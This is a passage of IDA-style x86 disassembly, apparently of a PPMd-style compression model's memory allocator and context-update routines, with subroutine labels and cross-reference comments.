mov esi, [eax+4]
mov edi, [eax]
mov [esi], edi
mov esi, [eax]
mov edi, [eax+4]
mov [esi+4], edi
mov ax, [eax+0Ah]
add [edx+0Ah], ax
loc_9B15C0: ; CODE XREF: sub_9B1526+6F�j
; sub_9B1526+B3�j
movzx eax, word ptr [edx+0Ah]
lea eax, [eax+eax*2]
lea eax, [edx+eax*4]
cmp word ptr [eax+8], 0FFFFh
jz short loc_9B1597
loc_9B15D2: ; CODE XREF: sub_9B1526+81�j
mov edx, [edx]
lea eax, [ebp+var_C]
cmp edx, eax
jnz short loc_9B15C0
jmp loc_9B1662
; ---------------------------------------------------------------------------
loc_9B15E0: ; CODE XREF: sub_9B1526+144�j
mov edi, [eax]
lea edx, [eax+4]
mov esi, [edx]
mov [esi], edi
mov edx, [edx]
mov esi, [eax]
mov [esi+4], edx
movzx edx, word ptr [eax+0Ah]
cmp edx, 80h
jle short loc_9B1625
lea esi, [edx-81h]
shr esi, 7
inc esi
mov edi, esi
neg edi
shl edi, 7
add edx, edi
loc_9B160F: ; CODE XREF: sub_9B1526+FD�j
mov edi, [ecx+0B4h]
mov [eax], edi
mov [ecx+0B4h], eax
add eax, 600h
dec esi
jnz short loc_9B160F
loc_9B1625: ; CODE XREF: sub_9B1526+D4�j
movsx edi, word ptr [ecx+edx*2+102h]
movsx esi, word ptr [ecx+edi*2+0B8h]
cmp esi, edx
jz short loc_9B1658
movsx ebx, word ptr [ecx+edi*2+0B6h]
dec edi
mov esi, edx
sub esi, ebx
sub edx, esi
lea esi, [ecx+esi*4+1Ch]
mov ebx, [esi]
lea edx, [edx+edx*2]
lea edx, [eax+edx*4]
mov [edx], ebx
mov [esi], edx
loc_9B1658: ; CODE XREF: sub_9B1526+111�j
lea edx, [ecx+edi*4+20h]
mov esi, [edx]
mov [eax], esi
mov [edx], eax
loc_9B1662: ; CODE XREF: sub_9B1526+B5�j
mov eax, [ebp+var_C]
loc_9B1665: ; CODE XREF: sub_9B1526+69�j
lea edx, [ebp+var_C]
cmp eax, edx
jnz loc_9B15E0
pop edi
pop esi
pop ebx
leave
retn
sub_9B1526 endp
; =============== S U B R O U T I N E =======================================
sub_9B1675 proc near ; CODE XREF: sub_9B16FB+45�p
; sub_9B1748+26�p
cmp word ptr [esi+204h], 0
jnz short loc_9B169E
mov ecx, esi
mov word ptr [esi+204h], 0FFh
call sub_9B1526
lea ecx, [esi+edi*4+20h]
mov eax, [ecx]
test eax, eax
jz short loc_9B169E
mov edx, [eax]
mov [ecx], edx
retn
; ---------------------------------------------------------------------------
loc_9B169E: ; CODE XREF: sub_9B1675+8�j
; sub_9B1675+22�j
mov edx, edi
lea eax, [esi+edi*4+20h]
loc_9B16A4: ; CODE XREF: sub_9B1675+3B�j
inc edx
add eax, 4
cmp edx, 26h
jz short loc_9B16CC
cmp dword ptr [eax], 0
jz short loc_9B16A4
push ebx
mov ebx, [esi+edx*4+20h]
mov eax, [ebx]
mov [esi+edx*4+20h], eax
push ebx
mov ecx, edi
mov eax, esi
call sub_9B1363
pop ecx
mov eax, ebx
pop ebx
retn
; ---------------------------------------------------------------------------
loc_9B16CC: ; CODE XREF: sub_9B1675+36�j
dec word ptr [esi+204h]
movsx eax, word ptr [esi+edi*2+0B8h]
mov ecx, [esi+0Ch]
mov edx, ecx
sub edx, [esi]
lea eax, [eax+eax*2]
shl eax, 2
cmp edx, eax
jle short loc_9B16F8
sub ecx, eax
sub [esi+4], eax
mov eax, [esi+4]
mov [esi+0Ch], ecx
retn
; ---------------------------------------------------------------------------
loc_9B16F8: ; CODE XREF: sub_9B1675+75�j
xor eax, eax
retn
sub_9B1675 endp
; =============== S U B R O U T I N E =======================================
sub_9B16FB proc near ; CODE XREF: sub_9B1776+25�p
; sub_9B17CA+7B�p ...
push esi
mov esi, ecx
push edi
movsx edi, word ptr [esi+eax*2+102h]
lea ecx, [esi+edi*4+20h]
mov eax, [ecx]
test eax, eax
jz short loc_9B1717
mov edx, [eax]
mov [ecx], edx
jmp short loc_9B1745
; ---------------------------------------------------------------------------
loc_9B1717: ; CODE XREF: sub_9B16FB+14�j
mov eax, [esi+14h]
lea edx, [esi+edi*2+0B8h]
movsx ecx, word ptr [edx]
lea ecx, [ecx+ecx*2]
lea ecx, [eax+ecx*4]
cmp ecx, [esi+18h]
mov [esi+14h], ecx
jbe short loc_9B1745
movsx eax, word ptr [edx]
lea eax, [eax+eax*2]
shl eax, 2
sub ecx, eax
mov [esi+14h], ecx
call sub_9B1675
loc_9B1745: ; CODE XREF: sub_9B16FB+1A�j
; sub_9B16FB+35�j
pop edi
pop esi
retn
sub_9B16FB endp
; =============== S U B R O U T I N E =======================================
sub_9B1748 proc near ; CODE XREF: sub_9B17CA+45�p
; sub_9B1BD9+115�p
push esi
mov esi, eax
mov eax, [esi+18h]
cmp eax, [esi+14h]
jz short loc_9B175B
add eax, 0FFFFFFF4h
mov [esi+18h], eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_9B175B: ; CODE XREF: sub_9B1748+9�j
cmp dword ptr [esi+20h], 0
jz short loc_9B176B
mov eax, [esi+20h]
mov ecx, [eax]
mov [esi+20h], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_9B176B: ; CODE XREF: sub_9B1748+17�j
push edi
xor edi, edi
call sub_9B1675
pop edi
pop esi
retn
sub_9B1748 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B1776 proc near ; CODE XREF: sub_9B1D29+178�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
movsx eax, word ptr [edi+esi*2+102h]
movsx ecx, word ptr [edi+esi*2+104h]
cmp eax, ecx
mov [ebp+var_4], eax
jnz short loc_9B1796
mov eax, ebx
leave
retn
; ---------------------------------------------------------------------------
loc_9B1796: ; CODE XREF: sub_9B1776+1A�j
lea eax, [esi+1]
mov ecx, edi
call sub_9B16FB
test eax, eax
mov [ebp+var_8], eax
jz short loc_9B17C5
lea ecx, [esi+esi*2]
shl ecx, 2
push ecx ; Size
push ebx ; Src
push eax ; Dst
call memcpy
mov eax, [ebp+var_4]
lea eax, [edi+eax*4+20h]
mov ecx, [eax]
mov [ebx], ecx
add esp, 0Ch
mov [eax], ebx
loc_9B17C5: ; CODE XREF: sub_9B1776+2F�j
mov eax, [ebp+var_8]
leave
retn
sub_9B1776 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B17CA proc near ; CODE XREF: sub_9B192C+10�p
; sub_9B1D29+A8�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push 100h ; Size
xor ebx, ebx
lea eax, [edi+888h]
push ebx ; Val
push eax ; Dst
call memset
add esp, 0Ch
lea esi, [edi+654h]
call sub_9B142D
mov eax, [edi+87Ch]
cmp eax, 0Ch
jl short loc_9B1802
push 0Ch
pop eax
loc_9B1802: ; CODE XREF: sub_9B17CA+33�j
or ecx, 0FFFFFFFFh
sub ecx, eax
mov eax, esi
mov [edi+884h], ecx
call sub_9B1748
cmp eax, ebx
mov [edi+8], eax
mov [edi+4], eax
jz short loc_9B185C
mov [eax], ebx
mov eax, [edi+87Ch]
mov [edi+878h], eax
mov eax, [edi+4]
mov word ptr [eax+0Ah], 100h
mov eax, [edi+4]
mov word ptr [eax+8], 101h
mov eax, 80h
mov ecx, esi
call sub_9B16FB
mov ecx, [edi+4]
mov [ecx+4], eax
mov eax, [edi+4]
mov eax, [eax+4]
cmp eax, ebx
mov [edi], eax
jnz short loc_9B1863
loc_9B185C: ; CODE XREF: sub_9B17CA+52�j
xor eax, eax
jmp loc_9B1928
; ---------------------------------------------------------------------------
loc_9B1863: ; CODE XREF: sub_9B17CA+90�j
mov eax, [edi+884h]
mov [edi+880h], eax
xor ecx, ecx
mov [edi+4C89h], bl
xor eax, eax
loc_9B1879: ; CODE XREF: sub_9B17CA+D6�j
mov edx, [edi+4]
mov edx, [edx+4]
mov [edx+eax+4], cl
mov edx, [edi+4]
mov edx, [edx+4]
mov byte ptr [edx+eax+5], 1
mov edx, [edi+4]
mov edx, [edx+4]
mov [eax+edx], ebx
add eax, 6
inc ecx
cmp eax, 600h
jl short loc_9B1879
lea eax, [edi+0C88h]
mov [ebp+var_4], ebx
mov [ebp+var_C], eax
loc_9B18AE: ; CODE XREF: sub_9B17CA+133�j
mov ebx, [ebp+var_4]
mov eax, [ebp+var_C]
add ebx, 2
mov ecx, offset dword_9A6AC4
mov [ebp+var_8], eax
loc_9B18BF: ; CODE XREF: sub_9B17CA+123�j
mov esi, [ebp+var_8]
mov [ebp+var_10], 8
loc_9B18C9: ; CODE XREF: sub_9B17CA+115�j
movzx eax, word ptr [ecx]
cdq
idiv ebx
mov edx, 4000h
sub edx, eax
mov [esi], dx
add esi, 10h
dec [ebp+var_10]
jnz short loc_9B18C9
add [ebp+var_8], 2
inc ecx
inc ecx
cmp ecx, offset byte_9A6AD4
jl short loc_9B18BF
inc [ebp+var_4]
mov eax, 80h
add [ebp+var_C], eax
cmp [ebp+var_4], eax
jl short loc_9B18AE
xor edx, edx
lea ecx, [edi+0Fh]
loc_9B1904: ; CODE XREF: sub_9B17CA+159�j
lea eax, [edx+edx*4+0Ah]
push 10h
shl eax, 3
pop esi
loc_9B190E: ; CODE XREF: sub_9B17CA+153�j
mov byte ptr [ecx-1], 3
mov [ecx-3], ax
mov byte ptr [ecx], 4
add ecx, 4
dec esi
jnz short loc_9B190E
inc edx
cmp edx, 19h
jl short loc_9B1904
xor eax, eax
inc eax
loc_9B1928: ; CODE XREF: sub_9B17CA+94�j
pop esi
pop ebx
leave
retn
sub_9B17CA endp
; =============== S U B R O U T I N E =======================================
sub_9B192C proc near ; CODE XREF: sub_9B24A5+22�j
; sub_9B24CC+D9�p
push edi
mov edi, ecx
mov byte ptr [edi+4C88h], 1
mov [edi+87Ch], eax
call sub_9B17CA
test eax, eax
jnz short loc_9B1947
pop edi
retn
; ---------------------------------------------------------------------------
loc_9B1947: ; CODE XREF: sub_9B192C+17�j
push 9 ; Size
lea eax, [edi+0A8Ah]
push 4 ; Val
push eax ; Dst
mov byte ptr [edi+0A88h], 0
mov byte ptr [edi+0A89h], 2
call memset
push 0F5h ; Size
lea eax, [edi+0A93h]
push 6 ; Val
push eax ; Dst
call memset
add esp, 18h
xor eax, eax
loc_9B197D: ; CODE XREF: sub_9B192C+5C�j
mov [edi+eax+988h], al
inc eax
cmp eax, 3
jl short loc_9B197D
push ebx
push esi
xor esi, esi
inc esi
mov edx, eax
mov ebx, esi
mov ecx, 100h
jmp short loc_9B19A9
; ---------------------------------------------------------------------------
loc_9B199A: ; CODE XREF: sub_9B192C+7F�j
dec esi
mov [edi+eax+988h], dl
jnz short loc_9B19A8
inc ebx
mov esi, ebx
inc edx
loc_9B19A8: ; CODE XREF: sub_9B192C+76�j
inc eax
loc_9B19A9: ; CODE XREF: sub_9B192C+6C�j
cmp eax, ecx
jl short loc_9B199A
push 40h ; Size
lea eax, [edi+0B88h]
push 0 ; Val
push eax ; Dst
call memset
push 0C0h ; Size
lea eax, [edi+0BC8h]
push 8 ; Val
push eax ; Dst
call memset
add esp, 18h
pop esi
xor eax, eax
pop ebx
mov byte ptr [edi+64Eh], 7
inc eax
pop edi
retn
sub_9B192C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B19E1 proc near ; CODE XREF: sub_9B1A07+26�p
; sub_9B1D29+4C�p ...
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, [ebp+arg_0]
push edi
lea edi, [ebp+var_8]
movsd
movsw
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
movsd
movsw
mov edi, [ebp+arg_4]
lea esi, [ebp+var_8]
movsd
movsw
pop edi
pop esi
leave
retn
sub_9B19E1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B1A07 proc near ; CODE XREF: sub_9B1FE8+79�p
; sub_9B1FE8+ED�p ...
var_20 = byte ptr -20h
var_1B = byte ptr -1Bh
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_F = byte ptr -0Fh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
movzx ecx, word ptr [eax+0Ah]
mov [ebp+var_18], ecx
dec ecx
push ebx
mov [ebp+var_8], ecx
mov ecx, [ebp+arg_0]
mov ecx, [ecx]
push esi
lea edx, [eax+4]
push edi
mov [ebp+var_4], edx
jmp short loc_9B1A37
; ---------------------------------------------------------------------------
loc_9B1A28: ; CODE XREF: sub_9B1A07+32�j
lea esi, [ecx-6]
push esi
push ecx
call sub_9B19E1
add esp, 8
mov ecx, esi
loc_9B1A37: ; CODE XREF: sub_9B1A07+1F�j
cmp ecx, [edx]
jnz short loc_9B1A28
mov edx, [edx]
add byte ptr [edx+5], 4
add word ptr [eax+8], 4
mov dx, [eax+8]
movzx esi, byte ptr [ecx+5]
movzx ebx, dx
xor edx, edx
sub ebx, esi
mov esi, [ebp+arg_0]
cmp [esi+878h], edx
setnz dl
mov [ebp+var_14], edx
movzx edx, byte ptr [ecx+5]
add edx, [ebp+var_14]
sar edx, 1
mov [ecx+5], dl
movzx dx, dl
mov [eax+8], dx
loc_9B1A78: ; CODE XREF: sub_9B1A07+CE�j
movzx edx, byte ptr [ecx+0Bh]
mov esi, [ebp+var_14]
add ecx, 6
sub ebx, edx
mov [ebp+var_C], edx
add edx, esi
sar edx, 1
mov [ecx+5], dl
movzx dx, dl
add [eax+8], dx
mov dl, [ecx+5]
cmp dl, [ecx-1]
jbe short loc_9B1AD2
mov esi, ecx
lea edi, [ebp+var_20]
movsd
mov edx, ecx
movsw
loc_9B1AA8: ; CODE XREF: sub_9B1A07+C1�j
lea esi, [edx-6]
mov edi, edx
movsd
movsw
mov esi, [ebp+var_4]
sub edx, 6
cmp edx, [esi]
mov [ebp+var_C], edx
jz short loc_9B1ACA
mov dl, [ebp+var_1B]
mov esi, [ebp+var_C]
cmp dl, [esi-1]
mov edx, esi
ja short loc_9B1AA8
loc_9B1ACA: ; CODE XREF: sub_9B1A07+B4�j
lea esi, [ebp+var_20]
mov edi, edx
movsd
movsw
loc_9B1AD2: ; CODE XREF: sub_9B1A07+95�j
dec [ebp+var_8]
jnz short loc_9B1A78
add ecx, 5
cmp byte ptr [ecx], 0
jnz short loc_9B1B47
loc_9B1ADF: ; CODE XREF: sub_9B1A07+E1�j
inc [ebp+var_8]
sub ecx, 6
cmp byte ptr [ecx], 0
jz short loc_9B1ADF
mov ecx, [ebp+var_8]
sub [eax+0Ah], cx
add ebx, ecx
mov cx, [eax+0Ah]
cmp cx, 1
jnz short loc_9B1B47
mov eax, [ebp+var_4]
mov edx, [eax]
mov esi, edx
lea edi, [ebp+var_14]
movsd
movsw
loc_9B1B0A: ; CODE XREF: sub_9B1A07+110�j
mov al, [ebp+var_F]
shr al, 1
sub [ebp+var_F], al
sar ebx, 1
cmp ebx, 1
jg short loc_9B1B0A
mov eax, [ebp+var_18]
mov ecx, [ebp+arg_0]
mov edi, [ebp+var_4]
inc eax
sar eax, 1
movsx eax, word ptr [ecx+eax*2+756h]
lea eax, [ecx+eax*4+674h]
mov esi, [eax]
mov [edx], esi
mov [eax], edx
mov [ecx], edi
lea esi, [ebp+var_14]
movsd
movsw
jmp loc_9B1BD4
; ---------------------------------------------------------------------------
loc_9B1B47: ; CODE XREF: sub_9B1A07+D6�j
; sub_9B1A07+F4�j
mov ecx, ebx
sar ecx, 1
sub ebx, ecx
add [eax+8], bx
mov ecx, [ebp+var_18]
movzx eax, word ptr [eax+0Ah]
inc ecx
sar ecx, 1
inc eax
sar eax, 1
cmp ecx, eax
jz short loc_9B1BCA
mov edx, [ebp+var_4]
mov esi, [ebp+arg_0]
mov edi, [edx]
movsx ecx, word ptr [esi+ecx*2+756h]
movsx edx, word ptr [esi+eax*2+756h]
add esi, 654h
cmp ecx, edx
mov [ebp+var_18], ecx
jz short loc_9B1BC5
lea ecx, [esi+edx*4+20h]
mov ebx, [ecx]
test ebx, ebx
jz short loc_9B1BB7
mov edx, [ebx]
lea eax, [eax+eax*2]
shl eax, 2
push eax ; Size
push edi ; Src
push ebx ; Dst
mov [ecx], edx
call memcpy
mov eax, [ebp+var_18]
lea eax, [esi+eax*4+20h]
mov ecx, [eax]
mov [edi], ecx
mov [eax], edi
add esp, 0Ch
mov edi, ebx
jmp short loc_9B1BC5
; ---------------------------------------------------------------------------
loc_9B1BB7: ; CODE XREF: sub_9B1A07+188�j
mov ecx, edx
mov edx, [ebp+var_18]
push edi
mov eax, esi
call sub_9B1363
pop ecx
loc_9B1BC5: ; CODE XREF: sub_9B1A07+17E�j
; sub_9B1A07+1AE�j
mov eax, [ebp+var_4]
mov [eax], edi
loc_9B1BCA: ; CODE XREF: sub_9B1A07+159�j
mov eax, [ebp+var_4]
mov eax, [eax]
mov ecx, [ebp+arg_0]
mov [ecx], eax
loc_9B1BD4: ; CODE XREF: sub_9B1A07+13B�j
pop edi
pop esi
pop ebx
leave
retn
sub_9B1A07 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B1BD9 proc near ; CODE XREF: sub_9B1D29+89�p
; sub_9B1D29+E6�p
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
push esi
mov esi, eax
mov eax, [esi]
mov ebx, [esi+4]
xor edx, edx
cmp [ebp+arg_0], edx
lea ecx, [ebp+var_10C]
push edi
mov edi, [eax]
mov [ebp+var_4], ecx
jnz short loc_9B1C11
cmp [ebx], edx
mov [ebp+var_10C], eax
lea eax, [ebp+var_108]
mov [ebp+var_4], eax
jz short loc_9B1C64
loc_9B1C11: ; CODE XREF: sub_9B1BD9+23�j
cmp [ebp+arg_4], edx
jz short loc_9B1C1D
mov eax, [ebp+arg_4]
mov ebx, [ebx]
jmp short loc_9B1C3D
; ---------------------------------------------------------------------------
loc_9B1C1D: ; CODE XREF: sub_9B1BD9+3B�j
; sub_9B1BD9+73�j
mov ebx, [ebx]
cmp word ptr [ebx+0Ah], 1
jz short loc_9B1C3A
mov ecx, [esi]
mov eax, [ebx+4]
mov cl, [ecx+4]
jmp short loc_9B1C33
; ---------------------------------------------------------------------------
loc_9B1C30: ; CODE XREF: sub_9B1BD9+5D�j
add eax, 6
loc_9B1C33: ; CODE XREF: sub_9B1BD9+55�j
cmp [eax+4], cl
jnz short loc_9B1C30
jmp short loc_9B1C3D
; ---------------------------------------------------------------------------
loc_9B1C3A: ; CODE XREF: sub_9B1BD9+4B�j
lea eax, [ebx+4]
loc_9B1C3D: ; CODE XREF: sub_9B1BD9+42�j
; sub_9B1BD9+5F�j
cmp [eax], edi
jnz short loc_9B1C50
mov ecx, [ebp+var_4]
add [ebp+var_4], 4
cmp [ebx], edx
mov [ecx], eax
jnz short loc_9B1C1D
jmp short loc_9B1C52
; ---------------------------------------------------------------------------
loc_9B1C50: ; CODE XREF: sub_9B1BD9+66�j
mov ebx, [eax]
loc_9B1C52: ; CODE XREF: sub_9B1BD9+75�j
lea eax, [ebp+var_10C]
cmp [ebp+var_4], eax
jnz short loc_9B1C64
mov eax, ebx
jmp loc_9B1D24
; ---------------------------------------------------------------------------
loc_9B1C64: ; CODE XREF: sub_9B1BD9+36�j
; sub_9B1BD9+82�j
mov cl, [edi]
mov dx, [ebx+0Ah]
inc edi
cmp dx, 1
mov [ebp+var_8], cl
mov [ebp+var_C], edi
jz short loc_9B1CD8
cmp ebx, [esi+654h]
jbe loc_9B1D22
mov eax, [ebx+4]
cmp [eax+4], cl
jz short loc_9B1CA1
mov edi, [esi+65Ch]
loc_9B1C91: ; CODE XREF: sub_9B1BD9+C6�j
add eax, 6
cmp eax, edi
ja loc_9B1D22
cmp [eax+4], cl
jnz short loc_9B1C91
loc_9B1CA1: ; CODE XREF: sub_9B1BD9+B0�j
movzx eax, byte ptr [eax+5]
movzx ecx, word ptr [ebx+8]
movzx edx, dx
dec eax
sub ecx, edx
sub ecx, eax
lea edx, [eax+eax]
cmp edx, ecx
ja short loc_9B1CC3
lea eax, [eax+eax*4]
cmp ecx, eax
sbb eax, eax
neg eax
jmp short loc_9B1CD4
; ---------------------------------------------------------------------------
loc_9B1CC3: ; CODE XREF: sub_9B1BD9+DD�j
lea edi, [ecx+55555555h]
lea eax, [edx+edi*2]
add eax, edi
add ecx, ecx
xor edx, edx
div ecx
loc_9B1CD4: ; CODE XREF: sub_9B1BD9+E8�j
inc al
jmp short loc_9B1CDB
; ---------------------------------------------------------------------------
loc_9B1CD8: ; CODE XREF: sub_9B1BD9+9C�j
mov al, [ebx+9]
loc_9B1CDB: ; CODE XREF: sub_9B1BD9+FD�j
add esi, 654h
mov [ebp+var_7], al
mov [ebp+arg_0], esi
loc_9B1CE7: ; CODE XREF: sub_9B1BD9+145�j
mov eax, [ebp+arg_0]
sub [ebp+var_4], 4
call sub_9B1748
test eax, eax
jz short loc_9B1D0F
mov ecx, [ebp+var_4]
mov ecx, [ecx]
lea edi, [eax+4]
lea esi, [ebp+var_C]
movsd
mov word ptr [eax+0Ah], 1
movsw
mov [eax], ebx
mov [ecx], eax
loc_9B1D0F: ; CODE XREF: sub_9B1BD9+11C�j
test eax, eax
mov ebx, eax
jz short loc_9B1D22
lea ecx, [ebp+var_10C]
cmp [ebp+var_4], ecx
jnz short loc_9B1CE7
jmp short loc_9B1D24
; ---------------------------------------------------------------------------
loc_9B1D22: ; CODE XREF: sub_9B1BD9+A4�j
; sub_9B1BD9+BD�j ...
xor eax, eax
loc_9B1D24: ; CODE XREF: sub_9B1BD9+86�j
; sub_9B1BD9+147�j
pop edi
pop esi
pop ebx
leave
retn
sub_9B1BD9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B1D29 proc near ; CODE XREF: sub_9B25BF+13D�p
var_24 = dword ptr -24h
var_20 = word ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 24h
push ebx
mov ebx, [ebp+arg_0]
push esi
mov esi, [ebx]
push edi
lea edi, [ebp+var_24]
movsd
movsw
mov dx, [ebp+var_20]
xor edi, edi
cmp dh, 1Fh
jnb short loc_9B1DA4
mov eax, [ebx+4]
mov eax, [eax]
test eax, eax
jz short loc_9B1DA4
cmp word ptr [eax+0Ah], 1
jz short loc_9B1D94
mov edi, [eax+4]
cmp [edi+4], dl
jz short loc_9B1D7F
loc_9B1D60: ; CODE XREF: sub_9B1D29+3D�j
add edi, 6
cmp [edi+4], dl
jnz short loc_9B1D60
mov cl, [edi+5]
cmp cl, [edi-1]
jb short loc_9B1D7F
lea ecx, [edi-6]
push ecx
push edi
call sub_9B19E1
add esp, 8
mov edi, ecx
loc_9B1D7F: ; CODE XREF: sub_9B1D29+35�j
; sub_9B1D29+45�j
mov cl, [edi+5]
cmp cl, 73h
jnb short loc_9B1DA4
add cl, 2
mov [edi+5], cl
add word ptr [eax+8], 2
jmp short loc_9B1DA4
; ---------------------------------------------------------------------------
loc_9B1D94: ; CODE XREF: sub_9B1D29+2D�j
lea edi, [eax+4]
mov al, [edi+5]
cmp al, 20h
setb cl
add cl, al
mov [edi+5], cl
loc_9B1DA4: ; CODE XREF: sub_9B1D29+1D�j
; sub_9B1D29+26�j ...
cmp dword ptr [ebx+878h], 0
jnz short loc_9B1DE3
push edi
push 1
mov eax, ebx
call sub_9B1BD9
pop ecx
pop ecx
mov ecx, [ebx]
mov [ecx], eax
mov eax, [ebx]
mov eax, [eax]
test eax, eax
mov [ebx+8], eax
mov [ebx+4], eax
jnz loc_9B1E77
loc_9B1DCF: ; CODE XREF: sub_9B1D29+D4�j
; sub_9B1D29+F2�j ...
mov edi, ebx
call sub_9B17CA
test eax, eax
jnz loc_9B1FDC
jmp loc_9B1E7A
; ---------------------------------------------------------------------------
loc_9B1DE3: ; CODE XREF: sub_9B1D29+82�j
lea esi, [ebx+654h]
mov eax, [esi]
mov [eax], dl
inc dword ptr [esi]
mov eax, [esi]
cmp eax, [ebx+660h]
mov [ebp+var_C], esi
mov [ebp+var_14], eax
jnb short loc_9B1DCF
cmp [ebp+var_24], 0
jz short loc_9B1E3E
cmp [ebp+var_24], eax
ja short loc_9B1E21
push edi
push 0
mov eax, ebx
call sub_9B1BD9
test eax, eax
pop ecx
pop ecx
mov [ebp+var_24], eax
jz short loc_9B1DCF
mov dx, [ebp+var_20]
loc_9B1E21: ; CODE XREF: sub_9B1D29+DF�j
dec dword ptr [ebx+878h]
jnz short loc_9B1E48
mov eax, [ebp+var_24]
mov [ebp+var_14], eax
mov eax, [ebx+8]
xor ecx, ecx
cmp eax, [ebx+4]
setnz cl
sub [esi], ecx
jmp short loc_9B1E48
; ---------------------------------------------------------------------------
loc_9B1E3E: ; CODE XREF: sub_9B1D29+DA�j
mov ecx, [ebx]
mov [ecx], eax
mov eax, [ebx+4]
mov [ebp+var_24], eax
loc_9B1E48: ; CODE XREF: sub_9B1D29+FE�j
; sub_9B1D29+113�j
mov ecx, [ebx+4]
movzx edi, word ptr [ecx+0Ah]
movzx eax, word ptr [ecx+8]
movzx edx, dh
sub eax, edx
sub eax, edi
mov [ebp+var_8], edi
mov edi, [ebx+8]
inc eax
cmp edi, ecx
mov [ebp+var_18], edx
mov [ebp+var_1C], eax
mov [ebp+var_4], edi
jnz short loc_9B1E85
loc_9B1E6E: ; CODE XREF: sub_9B1D29+2AE�j
mov eax, [ebp+var_24]
mov [ebx+4], eax
mov [ebx+8], eax
loc_9B1E77: ; CODE XREF: sub_9B1D29+A0�j
; sub_9B1D29+2BA�j
xor eax, eax
inc eax
loc_9B1E7A: ; CODE XREF: sub_9B1D29+B5�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_9B1E7F: ; CODE XREF: sub_9B1D29+2A8�j
mov edi, [ebp+var_4]
mov esi, [ebp+var_C]
loc_9B1E85: ; CODE XREF: sub_9B1D29+143�j
movzx edx, word ptr [edi+0Ah]
xor eax, eax
inc eax
cmp edx, eax
mov [ebp+var_10], edx
jz short loc_9B1EEF
test al, dl
jnz short loc_9B1EBC
mov ebx, [edi+4]
mov edi, [ebp+var_C]
mov esi, edx
shr esi, 1
call sub_9B1776
test eax, eax
mov ecx, [ebp+var_4]
mov ebx, [ebp+arg_0]
mov [ecx+4], eax
jz loc_9B1DCF
mov edx, [ebp+var_10]
mov edi, ecx
loc_9B1EBC: ; CODE XREF: sub_9B1D29+16C�j
mov ax, [edi+8]
movzx esi, ax
mov ecx, edx
shl ecx, 3
cmp ecx, esi
sbb ecx, ecx
inc ecx
mov esi, edx
shl esi, 2
cmp [ebp+var_8], esi
sbb esi, esi
inc esi
and ecx, esi
lea esi, [edx+edx]
cmp esi, [ebp+var_8]
sbb esi, esi
neg esi
add esi, eax
lea eax, [esi+ecx*2]
mov [edi+8], ax
jmp short loc_9B1F41
; ---------------------------------------------------------------------------
loc_9B1EEF: ; CODE XREF: sub_9B1D29+168�j
mov ecx, esi
call sub_9B16FB
test eax, eax
jz loc_9B1DCF
lea ecx, [edi+4]
mov esi, ecx
mov edi, eax
movsd
movsw
mov [ecx], eax
mov cl, [eax+5]
cmp cl, 1Eh
jnb short loc_9B1F19
shl cl, 1
mov [eax+5], cl
jmp short loc_9B1F1D
; ---------------------------------------------------------------------------
loc_9B1F19: ; CODE XREF: sub_9B1D29+1E7�j
mov byte ptr [eax+5], 78h
loc_9B1F1D: ; CODE XREF: sub_9B1D29+1EE�j
movzx ax, byte ptr [eax+5]
mov edx, [ebp+var_10]
push 3
pop ecx
cmp ecx, [ebp+var_8]
sbb ecx, ecx
neg ecx
add cx, [ebx+874h]
add ecx, eax
mov eax, [ebp+var_4]
mov [eax+8], cx
mov edi, eax
loc_9B1F41: ; CODE XREF: sub_9B1D29+1C4�j
movzx eax, word ptr [edi+8]
mov esi, [ebp+var_1C]
lea ecx, [eax+6]
imul ecx, [ebp+var_18]
add eax, esi
lea esi, [eax+eax*2]
shl ecx, 1
shl esi, 1
cmp ecx, esi
mov [ebp+var_10], ecx
mov esi, eax
jnb short loc_9B1F7E
shl esi, 2
cmp ecx, esi
sbb esi, esi
inc esi
cmp eax, ecx
sbb eax, eax
xor ecx, ecx
mov cx, [edi+8]
neg eax
lea eax, [esi+eax+1]
add ecx, 3
jmp short loc_9B1FA9
; ---------------------------------------------------------------------------
loc_9B1F7E: ; CODE XREF: sub_9B1D29+236�j
imul esi, 0Fh
cmp ecx, esi
sbb ecx, ecx
inc ecx
lea esi, [eax+eax*2]
shl esi, 2
cmp [ebp+var_10], esi
lea eax, [eax+eax*8]
sbb esi, esi
inc esi
add ecx, esi
cmp [ebp+var_10], eax
sbb eax, eax
inc eax
lea eax, [ecx+eax+4]
xor ecx, ecx
mov cx, [edi+8]
add ecx, eax
loc_9B1FA9: ; CODE XREF: sub_9B1D29+253�j
mov esi, [edi+4]
mov [edi+8], cx
lea ecx, [edx+edx*2]
lea esi, [esi+ecx*2]
mov ecx, [ebp+var_14]
mov [esi], ecx
mov cl, byte ptr [ebp+var_20]
mov [esi+4], cl
mov [esi+5], al
inc edx
mov [edi+0Ah], dx
